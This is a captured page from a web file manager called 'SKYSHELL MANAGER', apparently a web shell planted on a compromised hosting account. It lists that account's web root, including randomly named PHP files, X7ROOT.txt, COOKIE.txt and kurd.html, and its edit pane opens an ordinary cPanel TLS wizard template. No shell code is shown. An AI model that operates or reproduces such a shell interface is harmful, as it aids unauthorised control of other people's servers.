📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.html.tt
[% USE Geo; SET CPANEL.CPVAR.dprefix = "../../"; SET spinner_url = '/images/report-spinner.gif'; SET spinner_url = MagicRevision(spinner_url); SET countries = []; SET locales_obj = locale.get_locales_obj(); FOR ccode = Geo.COUNTRY_CODES; countries.push( [ ccode.upper(), locales_obj.get_territory_from_code(ccode) ] ); END; %] [% WRAPPER '_assets/master.html.tt' app_key = 'tls_wizard' use_master_bootstrap = 0 page_stylesheets = ['security/tls_wizard/index.css'] -%] <section id="txtPageDescription" class="description"> [% locale.maketext('You can use this interface to purchase and install [output,abbr,SSL,Secure Sockets Layer] certificates for your account.') %] [% locale.maketext("For more information on this interface, read the [output,url,_1,documentation,target,_2,id,_3].", "https://go.cpanel.net/ssltlswizard", "_blank", "lnkssltlswizardDocumentation") %] </section> [% IF !( CPANEL.feature('sslinstall') && CPANEL.feature('tls_wizard') && CPANEL.feature('market') ) -%] <div id="notAvailableError" class="alert alert-danger"> <span id="notAvailableErrorImg" class="glyphicon glyphicon-remove-sign"></span> <div id="notAvailableErrorMsg" class="alert-message"> [% locale.maketext('This feature is not available to your account.') -%] </div> </div> [% ELSE -%] [% SET pending_certificates = execute_or_die('Market', 'get_pending_ssl_certificates', { 'api.filter'=>1, 'api.filter_type'=>'ne', 'api.filter_term'=>'inactive', 'api.filter_column'=>'status' }).data; SET products_api = execute_or_die('Market', 'get_all_products', { 'api.filter'=>1, 'api.filter_type_0'=>'eq', 'api.filter_term_0'=>'ssl_certificate', 'api.filter_column_0'=>'product_group', 'api.filter_type_1'=>'eq', 'api.filter_term_1'=>'1', 'api.filter_column_1'=>'enabled', "api.sort"=>1, 'api.sort_column_0' => "recommended", "api.sort_method_0" => "numeric" "api.sort_reverse_0" => "1" 'api.sort_column_1' => "x_price_per_domain", "api.sort_method_1" => "numeric" }); SET products = products_api.data; %] [% IF products_api.messages.size -%] <div class="alert alert-warning"> <span class="glyphicon glyphicon-exclamation-sign"></span> <div class="alert-message"> [% FOR msg = products_api.messages -%] <p>[% msg.html() -%]</p> [% END -%] </div> </div> [% END -%] [% IF products.size %] [% SET domains = execute('WebVhosts','list_ssl_capable_domains').data; IF domains.size; %] <div ng-controller="BaseController" class="ng-cloak" ng-cloak id="app_tlsWizard"> <div class="loading" ng-show="loading"> <div class="callout callout-info"> <span class="fas fa-spinner fa-lg fa-spin"></span> [% locale.maketext('Loading …') %] </div> </div> <div ng-class="{'view-disabled':loading}" class="animate-view" ng-view></div> <cp-alert-list alert-group="'tlsWizard'"></cp-alert-list> <div growl></div> </div> <script type="text/javascript"> CPANEL.namespace("CPANEL"); CPANEL.PAGE = {}; CPANEL.PAGE.countries = [% countries.json() %]; CPANEL.PAGE.guessed_country_code = [% Geo.guess_country_code().json() %]; CPANEL.PAGE.products = [% products.json() %]; CPANEL.PAGE.domains = [% domains.json() %]; CPANEL.PAGE.pending_certificates = [% pending_certificates.json() %]; </script> [% PROCESS '_assets/cjt2_header_include.tt' %] [% ELSE %] <div class="alert alert-info"> <span class="glyphicon glyphicon-info-sign"></span> <div class="alert-message"> <p><strong>Info:</strong></p> <p>[% locale.maketext('This account does not have access to any domains that can be used with this interface.') %]</p> <p>[% locale.maketext("For more information regarding this interface, read the [output,url,_1,documentation,target,_2,id,_3].", "https://go.cpanel.net/ssltlswizard", "_blank", "lnkssltlswizardDocumentation") %]</p> </div> </div> [% END %] [% ELSE %] <div class="alert alert-info"> <span class="glyphicon glyphicon-info-sign"></span> <div class="alert-message"> <p><strong>Info:</strong></p> <p>[% locale.maketext('There are no [asis,SSL/TLS] products available at this time.') %] [% locale.maketext('[asis,SSL/TLS] providers can be enabled by the server administrator.') %]</p> <p>[% locale.maketext("For more information regarding this interface, read the [output,url,_1,documentation,target,_2,id,_3].", "https://go.cpanel.net/ssltlswizard", "_blank", "lnkssltlswizardDocumentation") %]</p> </div> </div> [% END %] [% END -%] [% END #wrapper %]
Save